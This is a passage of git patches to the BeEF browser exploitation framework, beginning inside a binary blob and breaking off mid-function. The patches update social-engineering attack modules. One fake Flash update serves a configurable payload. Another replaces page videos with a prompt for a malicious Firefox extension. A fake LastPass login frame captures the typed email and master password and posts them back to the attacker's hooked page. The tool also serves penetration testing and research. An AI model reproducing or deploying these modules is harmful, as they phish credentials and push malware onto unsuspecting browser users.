zJ@-d=h%;14i0P~5CZuaA5Z6y=!9`&h!6qU?DPh7jh%e%*H5od=Ca2`;Re0bn&ZO|=
z%i4#w;3+Oh_?!&DR|X>({cy@UBD3kO+A#&dDi1e?)&*6#<H-(GI?#E1y{Z1;77G0V
zWI*-BVW;$7)1ILNWa95r+kZV`ufHD&U<^W-alTqV7UDEaJmmCWaX>K61|6`kueKoD
z!XKE~6EFHs+mA54L>x=o2^zju%;{es;^4M77Nn#Q9pYjLcpY2@%h#-hdwZ%t2IRP9
zey~C2ZNmO|)hd)Li=TZ5Q}7FJgrFlNO$AB@Dwqs6*z1%*vsOwiRjO>F5!EN5pnq=3
z18m_U#HL(+qbGZ4HwT!Ifq=8d-RWnkBb|n!&H-H$n>xtpX<e1<n0_8r?5j)P(_QtF
zFmA_8@LM03Z8>&AgtY<WnHMsPWXmgL9#jn407HoL8VTX+A5N^26am5@VAKF9F%H=9
zi0%zsi=1gc|DbRPq0(qWt*Qp)!BWQfNb44#`6rPWK$OAx%c~}dMbj06mOd5`7RzAH
zXHZ0(xsh-^i9ge309HU6C*Kn<Fdy1$QTiivXBHM?i$IMaD@N3^khBDz2EvdGG&8O!
zC35dG|Iq<7WI~q+paolv(%fiIwhcj?1E-uQT4(^3rlA4~anAA;o~Uf5&^#*c#|(Jv
z?#=ZC6exvFv@M@<4+eM*3QYrC`7omOl0TiE8tm*N7G|<q0s+KV$Ib2}`l5(`0+aq#
zHA+y!u*c2z01ZDm;Qv>>k1{(pHT8P66RJncU-FNQ>%af|$*z_(4PO&X{<S^*qb<S2
zg*ZNDHXgB#>^~N%e``VUTVG-S1Nfk)6bkm6sT@2~LltB)`yaVB1UJMF6WV`ekkJU_
zZ3u}{^AQyGzgh?EW1NrBtpCbFNFT&Lk?6?(A7a0mW?4V9=YLQ^cu>b4!bn2RS^vDx
ze``DS3rzpV_y;Zy*x8E^ydW!%|1|Fhlv|h3=!f;{f4FQ=K+X>wU~@MA*tGtwb!!eQ
z(Cctn=PbN2{{$W-reg6d!YcwIjzJ9J_Jc;iE=H!Q71*&1fOc}b-0TrQU|Is=lFs(}
zzs&s7J*5L-zp_Rxp#NF+)3D_ZV)6)jjVTEI?d`2nzp%v|F*q_Zl5LrMo$zC%w1eQp
zoyqlBUZJyR5Zd*@u=Dx6Rahjgt7edc>-yfFn}C^L<v^sre}X!eQN}AGxi9Po^7t<*
zBa%=3-}fvO<bVxZFiZA-*ckp`9|tMxUmNDX0tgBM_4*lz0}*W~fr|8+j%v9s8!d!N
zB2*Sb2G+o>jzJ>i)}@pKPOICAz|uXA1=h?3Y8X@sJ9{FcS|X672M$qk=dpwCUUQzk
zRCT&qDvBUk+_<H>F8Uwg$8(g~=ZNp;Y5RMl3G2Nmr%j=y-v|S8ix&z~E))K2z4AG$
zD!>6WERhG1$e>r_Dplpq{s~}<0@J6JvDZW3%eU>(HzIw!+JUrf?2p6&tm<ggUi~@P
zvuz{(MQdDz;^TQa-!k9oG~Pi+fE7IBINi~q@Vm!7v1)15zYY554>HIdCd>dOYS0J>
zo`DY@ti$-Zp`Xz)<u(W4U2!<VZ2B=@+}r<;_>5<ySghxLPKpe|$<%HPHw5aPmzMkT
zNpJ11vUoVy_e3;^#4z!p6oGY`>gniy?)(lXjiGIu+e6V?Fp3Dt8ikr=dua~bUI-Pl
zcJl!zWW-5xn(3d18RG;gZ;IA4Fc%2!h$Rwo{JyiA><ZW^_kBA4`Ln`Q<85>-6H)uo
zc8~5W_Fif2-vwz6(zNzo*ZXeMmKBE6ZpYKBTtEEU3by<Xn{WI4VxO7+<n*{4;e)44
z9cVJ#bYODb4Mn_%KmWabeb{QlZK+Iut*IDFzbWk{Y_f<a|C~|4O>ccV*h50LH4rjL
z8J%PlI)>rJMOPJ0qzsw@hVT%T8qp@BLHXmH=@Dak4{tlp3#J(z#2qlq7nXtPxjGl!
zp`zVq*9)hB2^g}pk*yV%QhP-$3^}PVy>!gOQ<I1gqk?{*_dpv$G#5Dq@dV`S;;Ud0
zXDR>ug6OaM&dY*72IS!c#GTuM6i+0=onN2OqArGi4xPKX-q+;!ke<k?KLn>x-JRY6
ze*r|X%}Bc%VkCJ^4+#@=yN%Ci)uzbJRFw7%7U+s-C)mH+Out3;9~bXApCNB8EG*d1
zj@7AW4*(J8X3i8Fxz+7f=aq>Y)w8|ViPkcqJ6zsPB_a!pBWm`!^uV$+E$*s}Xx<+B
zT%3Lr()0D)wXrL@treEU7+C7RKQ^>N3773K#b%hvR?N_=bhH=@(sT#%+3Xo3%HB~4
zdN>}wHf`NmXA?JM`2E#-qyN_XY{)Zf(B`1;w8!xb?|+Ad>@8B3BVVNnQ2XU;yK1KP
zZt?IQ8S@5gNMiDFJu{3dNj8B|hZ3RG6N&X|!okZ~ts(8f9VilhR{_bv1{I|hVcuHK
zKAQ}EyOb?M$GCC1#R_%t?Kt_nZowOWWxsq4Ro+m~S<jp6*|E3t=R3l1x%}1IsrtOY
z_*s`y@#q)`xyR@*yBUn5Q?j!L&S-ePd~Bz##Qgj^FLnrx`5RdNKJUlzR8JN$0Y9le
z<3FvXO;I&-qc1a8@ZS>z)|=nw6tG`e%ce&9Y;d%+`1%?rEG<%t*-v!>fy(pMFn+-T
z0;9fb9pi}te0&RiOM<%dnu}+%OUIM)=2@4l5|<W4JuU~(IKO-O-xR!T-beJa#d4)g
z?^9|39YvO!@8h23fa;Dv_f<-t5ClSN6hvo6bZd9@#q||6S2wpQf*p1YHn{P9cg3JR
z3PhEE$fS;|57aolN}hNO^hUVkKST_QW0t}}${rGH*7iF{yKMK<RuM`g)i4MK_`$XW
z!D$Vf#M*3t`N9TfKpdhJYCcSt{(gGA4y|3wew#A*&FAqnLts@}R;F3IA^8)z684)+
zd%gMy@!ygVZcHz)sMJ}$kEQy6q~8HMl3x5eltj*)8+b$Ma(nGq?`sooWy4_?)F+-7
zZwOrPmoRj(l*q5wf%&BQHnP1LaABb{%iKoOe_N&X%R}3_)?z~T(J}Z42;qQjRAV9^
z{Q}3*BUzqo%@5fGL**m2GP_yU0qx`cJYM|w^T8^nl!;~=-uV03_7;b`JAF`cUGH<{
zp<q%=FYj`rxojOCmQw1CC#Ju@9(3{4+S6JRJu@g@t5vxOdsB3JmD$abW?g?K9*51j
zK=Rtwz~<!DP=sE4*R?1xtFvtn`~BJBZ(1+XdH~QE;IEZ0e6^Mzc)(S@HF-F6jbAQ<
zpc#`s880Gva}8-)mGx4d&ybhK{FxU<ipO&ILI3Cz_^ocIe!cP^*MrZ*MC@_eTI1PE
zZ{yp2bePIRwE;+XO7}kyt{!1@KVvz6lA919BN14hGbS@vK_#HmoYRtoc@F2o8%C~#
z|3=sD6=?Q*8*xsO&^giS<HPZbh){bc30IBvVtc*FU$yYQm!1v2Gmv*^I3muGyUzfV
z2CH0+=R>ada#uhV^b29F;q%MxR$wmg`t(|h@lbf@Ii-1=rH<0C$&GpO;4P+K)flTx
z)~qJ4v^#xXJ2bO?wRaxD7dWe?ecmxIaE9x^9f{6|WB1MZ-N|G3hn>h*5oTfLEty0G
z@7$Y%u)}(kK?88Hy#2u@s!O1_x>ET|pNrJ!m974dtf#X(mB8xT?Rf#82!005;+`^E
zpAO2q>ueWG!}}J`v*Sj0|F4T8ot>9vJ)N6G$jN6j{AalP#H;U`=rHZ5L9ZbO8Ge_W
zcfJ}ZZ@oV5ZkK)MJ<R2nSe~s4VKb#Z$!But8pe#5(sK|D%ykZmy);RSBQjU+^ctDf
zHY1oxv=V9j2v>Kgwc)G6<xs*VB##~{NM!9exs&c+mPvP*dAq-fW_|2OX&|ylg!E{?
zSZi_P8q+~?93bTrW+iPfH8))bosJ!C4xPtadh?GdZ#7`1#oyKH7WazBJ==HP!@>2|
zJ1y?gPh!AvVPsI`Qm0NeYsq;W9v*6~i6oNQ7*&72&4-vd(s9II<tMkx!H|a#DEPCr
z|FbFitws$_z0nSht)kCAT`0w$KCi#>7ZsJx!Ou8)4kG^AyQPc+V!9L3T$$9L>aglG
zb)h%;Ti(TLKvPccBKiknkd0=*JtTqnPM5Rh)7mC}>w`tLriX*^+x0DP&dOL{z@uHB
z=TMsbf<gOf!F!u0Q@wnyCPAM^s56mJbV?Y_=SFeeg;F7r1sn-y&4t8RPBfWC&eQL$
zI$!CcgQB8pb#&#k6E&=>*J&=ORBEaL(K6U#W9w+-Dyf=YR^BKO+A-R2U+~<~D!UI$
z20V|t@-MtvFZKV#5pFHMEB@+u%RBlzeUOuKDd2MQ_#^41T&I&Oc*OIM_su{$vTW$;
zXcmVp6oRU-jwM@CP8|s_^829l5t{t!!tH4t0T)Bm7s)`NfMnj14U1Q%*P#rI>HBpR
zlR3jY5w@;hBZ~38xyo8eJ-h+7xKF->mMG2c&Db8MpNsz63pm%S8DqQ<7?hAuc#ud*
zA};EHO+I}JL8*1&PSaN3#&gfgg>C@b4KuBN0ey$I=lWsJtME@phYgnBn(Eh&s`!;P
z6M5bqOKHDHrQ<7nbt>4s|BMy%kA4z|U-$TYRwbBFFt3^?(<Eq_q%KOzrxx;Qo(j=E
zH6ifCtqW$uVc@{V@A9u{b~@G6gO}d<ioS-x*WW#bC1(EO7Ar6YN<TT4C_T;e?hsq`
z&Qbr+!P=pH!@TdBM4v`j;rrB)*|*L6wD$(`wK1~?|2fXoxtRa@iir!yKlO6&c{f+g
z21FqCpYLt<%X~uNjX2EM=(%id_oxlnKZ$BCWWUpNU@E07pRI)=oMg>B_vlg^5I9EM
z)|J~UE_v9`oU5Q{(ln1ZfArCOZviK&!A?(WgnPw3KW4EP-N;KFxU?uZP(hnAb|l+o
zQ-WdsTYUw;Y?#XN4UOp%ntW?t&e0LBrKJv9Q268Brh#?DYk7U%It;pmzX^fn;(A?o
z{+n(~&*;Vs>FV6td1QO}sMpTs)Sz^Q=+}AHA-^Uc_fYb~#k%Z|wKTAx0EJTpmaX?W
zu2osvL)muL4t41y<UJZAtc%3G8*{|_6J*y|LM_{*sUlWvm%lzblyh}Q1Mno7vW2&m
zvhQhH*)rg#D*lQYTy5!y;?Lgrw$7Ey_OAPb{L;4*<_O&*CWF_Z8V;Ti-}gVcMeVsY
zm>w2M4j!2E>FRu5Ra@V4I?e9Z$zo=EF7KFx>(zfdV(A3}?ndB@iQ<U9X0=cET8n31
z^dNI)Cekz$^6_5_9TY+B9KRqB+%POPkW5o|AI-TRzL}*&?U(V#XQwOj2o!s`3Lp6F
z$Ofw;lqTh=UY@HbJ^>b^;73j5^o+jvY?1Bk4d_Hgt$OZOSJigg0n*;|@8X%4->h7x
zJkj*11xn;0mdOjQ;H9OODay9<e5_+-^!y+r$Iu&@1bgbcP>kRSLcm~YP?aJvWQNFA
zs5;m<bN5-os$+cLRy$pWZoF@Mc`AKgX2;eq9vlG;*QuKKZ@RzyyoS&<nw);TGCTy>
z@Yy>lJ@WdlGqt;vfAM3fbbMuT!BcdnntIdo?L^5cjNHW$ckn@+-Ew<!sZ(n2p6|SB
z!Ad*qkQ_xvW8zoqT4*>LebBJ)Zi~Jna^ZYGFRUq+O{b#tH!*B0KB=3*R$rbIT;|-d
z@w&c#UFo%!O3(FvpgvD`lfCZjG~pD<z;UqOxZBNV{!xOVm99&b^P-T=z|gKryt8LI
zZCQEAAR{Pi5<ofK<L;{n6m-zgLFY|y`?2->sY}r{1WjDI<brM@xl!j{s<^GaYZUoi
zp@cuEC_1ZXOvZDsBGiQqKd$#Tbkfw{B^>>ntK~<kD>l@hNj2(%fe*9H8q0ibjo}=~
z?p$`>13P2CuI_H%Zc#0;bwE)a3Il!(`qL=iVyv-0X~Or}X4qknm3j7opNJ&#Tw#KS
zdVG+eKI|Q}izu1qrF#vLvd?bZlWgdm)yB&pF&$pp(R_`*8|&_(qoMuurd?alZB|^}
z*{R*?lSLbK7$4~mbiUochKjz<3=}j3&z4pt?KPl)ewOF7qt}TfRo`fK=NPN2qwvno
zuK|>%(e#wm)WqCQ1>N0#kwl75TO!_T4W^?qva;ytYm`28p`oGn_V!g8HAT7M?3UB}
zhldsx7AkG=@$u$cj1#hoc<#A^zt__9^JiXE7s3#*|FjC~)z31t!w@(UPd4gUR}W6!
z+CejpM=VggGchp8$;<yR)nR31oD$?&;?AA!?d{#&-Azlw%AS(wUIze1M@FhO=nX@V
zkEd7r;hrXM`^7yxJe2s=5BK+fjZMPLmjzn*{FyTx`}|k#*w)wAan1BILrHP)pHf#%
z;LVL!e*X*!vI~4N+&*GqPz)CQcWNhnpW2p+ii*lg8?$fx0U;0&Bw!HZP#9!kH~o>#
zE}E@Yb7VK)HkN?aig|p}M7<>?-+EOTj<Zr;#H{1jF8&C-FW(6t&UkaF=W!|-bx6$t
z0Qj6Z%ENF30_>yfe|df)FP(_U$jFF_ifU`GU9tG4DY_OyMaY3}BS`KokS>pc=ScDs
zmhXJUL(M$FHCIUt`o<Pjvuk!sE*Y<;sj0Yd+^_^u6$%DBi4!a(9$gME#~K-+duSXf
zP~4doK(%r>LrY-WjUyaME2N+r=#W<ryz;_rwa$u>aD2Qqzqf?*QPl(HHqRBuWrCK;
zTe+aFhe)yL^2)IurUN9kqRvDRj`JDyG6cP&_K+%K_EDMS$EO4g`avyhsNOUv6k0bc
z4bXfv?JRiDQI3$v>LI(fbGsk^JO;vMA_A5~MzxxXy>vdqQHs#4TgxM=ybM+Im7<_6
zhWx7-R1!$*iNKMlfLQX5vk0tZ)$hkros<_yfgs_?kzUtAfa>M^hlI>OB!U>J2=k!k
z(4~Qg>bGKplORbvQwK>EisD;?&Q2Gg_hY~E!4**_AKHEKAv3l>0Rw+U7b=-8jQjH9
z8g~Mr|CdGDQDm7EAriwGBCF0_Tn|kS7J`H&29`wScvdUxwPVC>XM^W5KllR%>O;^Z
z1uzhi7(VqPC1y&m8j?PNW+lrbd`<B}$Ju?Bx$r1BP(ntZK+Pw?_N|!;$MbDL7e-V<
zmsTK#gCr6J5{d+<dDEQDI2+7+&!>Y;D`;>~uRfkgQ3xsQ-PvO$T&NG#4+gb}D%4pJ
zkL~ks!yq97G@(wE2#JXCk8XVQBpz%Y+P!-g|3CQMM6mfV?k``}KK+N%9V(Hjd@pSC
zKX{Y~P<gm;u8{4cBcP|8JjhL$koopM_+V~|AU9IvIONn1_4uJ73BgMcPQ41b{(~PT
z1(ltx+{zLEp$`Ue3QMA|G>XvkA3O;%9EpCUXtAjIe=I3UZueC%Yv+hi&;@~ke$wI!
KVznYhA^#8RMjoyJ

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
old mode 100644
new mode 100755
index 25ed298f5..854249bb2
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -5,29 +5,38 @@
 #
 class Fake_flash_update < BeEF::Core::Command
   
+  def pre_send
+    
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_flash_update/img/eng.png', '/adobe/flash_update', 'png')
+    
+  end
+  
   def self.options
+    
     configuration = BeEF::Core::Configuration.instance
+    
     proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
-    image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+    
+    image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/adobe/flash_update.png"
 
     return [
-        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
-        {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
-        {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
-        { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
-          'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
-          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
-        }
+        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Image', 'value' => image},
+        {'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
+          'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'],['Firefox_Extension']],
+          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload'},
+        {'name' =>'payload_uri', 'description' =>'Custom Payload URI', 'ui_label'=>'Custom Payload URI',
+            'value' => "https://github.com/beefproject/beef/archive/master.zip"}
     ]
   end
   
-  #
-  # This method is being called when a zombie sends some
-  # data back to the framework.
-  #
   def post_execute
-    save({'answer' => @datastore['answer']})
+    
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+    
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png')   
+        
   end
   
 end

From f1df608f644ee22e0e44a8d51b4854a8570d677f Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Wed, 30 Oct 2013 18:29:44 +0100
Subject: [PATCH 393/397] Module Update: lcamtuf Download

Updated Adobe Flash Player URL to the current one.
---
 modules/social_engineering/lcamtuf_download/module.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 mode change 100644 => 100755 modules/social_engineering/lcamtuf_download/module.rb

diff --git a/modules/social_engineering/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb
old mode 100644
new mode 100755
index f55c71d2e..b99df880b
--- a/modules/social_engineering/lcamtuf_download/module.rb
+++ b/modules/social_engineering/lcamtuf_download/module.rb
@@ -12,7 +12,7 @@ class Lcamtuf_download < BeEF::Core::Command
       'name' => 'real_file_uri', 
       'description' => 'The web accessible URI for the real file.',
       'ui_label' => 'Real File Path',
-      'value' => 'http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869',
+      'value' => 'http://get.adobe.com/flashplayer/',
       'width' => '300px' 
       },
       {

From 05502a3c91b7893553548df56b641c4206938d1e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 4 Nov 2013 15:52:54 +1030
Subject: [PATCH 394/397] fix bug preventing loading of
 'replace_video_fake_plugin' module

---
 .../replace_video_fake_plugin/config.yaml                  | 2 +-
 .../social_engineering/replace_video_fake_plugin/module.rb | 7 ++++---
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/social_engineering/replace_video_fake_plugin/config.yaml b/modules/social_engineering/replace_video_fake_plugin/config.yaml
index d085c1a62..4caab0a0b 100644
--- a/modules/social_engineering/replace_video_fake_plugin/config.yaml
+++ b/modules/social_engineering/replace_video_fake_plugin/config.yaml
@@ -7,7 +7,7 @@ beef:
     module:
         replace_video_fake_plugin:
             enable: true
-            category: ["Social Engineering"]
+            category: "Social Engineering"
             name: "Replace Videos (Fake Plugin)"
             description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
             authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb
index cc32a7f42..effc6bb9e 100644
--- a/modules/social_engineering/replace_video_fake_plugin/module.rb
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -6,10 +6,11 @@
 class Replace_video_fake_plugin < BeEF::Core::Command
 
   def self.options
-    @configuration = BeEF::Core::Configuration.instance
+    configuration = BeEF::Core::Configuration.instance
     proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port")
+    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
+    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+    url = "#{proto}://#{beef_host}:#{beef_port}"
     return [
         {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
         {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}

From 612d0d91bbc66248aaa518a4c3890a25c4797f2f Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Mon, 4 Nov 2013 15:41:31 +0100
Subject: [PATCH 395/397] Module Update: Fake LastPass

Updated Firefox frame in order to look more similar to the real one.
---
 .../fake_lastpass/command.js                  |   2 +-
 .../fake_lastpass/config.yaml                 |   2 +-
 .../fake_lastpass/create_small.png            | Bin
 .../social_engineering/fake_lastpass/icon.png | Bin
 .../fake_lastpass/index.html                  |   0
 .../fake_lastpass/indexFF.html                |  25 +++++++-----------
 .../fake_lastpass/jquery-1.5.2.min.js         |   0
 .../fake_lastpass/key_small.png               | Bin
 .../fake_lastpass/lpwhite_small.png           | Bin
 .../fake_lastpass/module.rb                   |   0
 .../fake_lastpass/q3Jrp.png                   | Bin
 .../fake_lastpass/screenkeyboard.png          | Bin
 .../fake_lastpass/xsmall.png                  | Bin
 13 files changed, 12 insertions(+), 17 deletions(-)
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/command.js
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/config.yaml
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/create_small.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/icon.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/index.html
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/indexFF.html
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/key_small.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/lpwhite_small.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/module.rb
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/q3Jrp.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/screenkeyboard.png
 mode change 100644 => 100755 modules/social_engineering/fake_lastpass/xsmall.png

diff --git a/modules/social_engineering/fake_lastpass/command.js b/modules/social_engineering/fake_lastpass/command.js
old mode 100644
new mode 100755
index ef4b7190d..025610518
--- a/modules/social_engineering/fake_lastpass/command.js
+++ b/modules/social_engineering/fake_lastpass/command.js
@@ -26,7 +26,7 @@ beef.execute(function() {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
 	} else {
 		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
-		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'260px','height':'300px','position':'fixed','left':(($j(window).width()/2)-130)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
 	}
 
diff --git a/modules/social_engineering/fake_lastpass/config.yaml b/modules/social_engineering/fake_lastpass/config.yaml
old mode 100644
new mode 100755
index c39c851ef..f56a66cce
--- a/modules/social_engineering/fake_lastpass/config.yaml
+++ b/modules/social_engineering/fake_lastpass/config.yaml
@@ -10,6 +10,6 @@ beef:
             category: "Social Engineering"
             name: "Fake LastPass"
             description: "Displays a fake LastPass user dialog."
-            authors: ["xntrik"]
+            authors: ["xntrik", "gcattani"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_lastpass/create_small.png b/modules/social_engineering/fake_lastpass/create_small.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/icon.png b/modules/social_engineering/fake_lastpass/icon.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/index.html b/modules/social_engineering/fake_lastpass/index.html
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/indexFF.html b/modules/social_engineering/fake_lastpass/indexFF.html
old mode 100644
new mode 100755
index f10985485..b32606ca3
--- a/modules/social_engineering/fake_lastpass/indexFF.html
+++ b/modules/social_engineering/fake_lastpass/indexFF.html
@@ -31,10 +31,6 @@ $(document).ready(function() {
 		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
 	});
 
-	$('#disableffpwd').change(function() {
-		parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
-	});
-
 	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
 		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
 		parent.postMessage('KILLFRAME','*');
@@ -45,21 +41,20 @@ $(document).ready(function() {
 </script>
 </head><body>
 
-<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
+<div style="text-align: center; padding-bottom:5px"><img src="/img/icon.png" /></div>
 <form>
 <div style="text-align: center">
-	<div style="text-align: left; padding-bottom:5px">Email</div>
-	<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
-	<div style="text-align: left; padding-bottom:5px">Master Password</div>
-	<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
-	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
-	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
-	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
-	<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
+	<div style="text-align: left; padding-left: 12px; padding-bottom:5px">Email</div>
+	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="text" style="width:220px;height:20px" id='u' /></div>
+	<div style="text-align: left; padding-left: 12px;padding-bottom:5px">Master Password</div>
+	<div style="text-align: left; padding-left: 12px;padding-bottom:10px"><input type="password" style="width:220px;height:20px" id='p' /></div>
+	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
+	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
+	<div style="text-align: left; padding-left: 12px; padding-bottom:10px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
 </div>
 
-<div style="text-align:center; padding-bottom:5px">
-	<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
+<div style="text-align:center; padding-left: 15px; padding-bottom:5px">
+	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
 	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
 </div>
 
diff --git a/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js b/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/key_small.png b/modules/social_engineering/fake_lastpass/key_small.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/lpwhite_small.png b/modules/social_engineering/fake_lastpass/lpwhite_small.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/module.rb b/modules/social_engineering/fake_lastpass/module.rb
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/q3Jrp.png b/modules/social_engineering/fake_lastpass/q3Jrp.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/screenkeyboard.png b/modules/social_engineering/fake_lastpass/screenkeyboard.png
old mode 100644
new mode 100755
diff --git a/modules/social_engineering/fake_lastpass/xsmall.png b/modules/social_engineering/fake_lastpass/xsmall.png
old mode 100644
new mode 100755

From ce2b5293aff69ec44484488cb0c87891515328da Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 5 Nov 2013 14:45:27 +1030
Subject: [PATCH 396/397] Add support for Firefox 25

---
 core/main/client/browser.js | 19 ++++++++++++++++---
 1 file changed, 16 insertions(+), 3 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 360b2e0eb..b66086ac6 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -284,12 +284,20 @@ beef.browser = {
         return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
     },
 
+    /**
+     * Returns true if FF25
+     * @example: beef.browser.isFF25()
+     */
+    isFF25:function () {
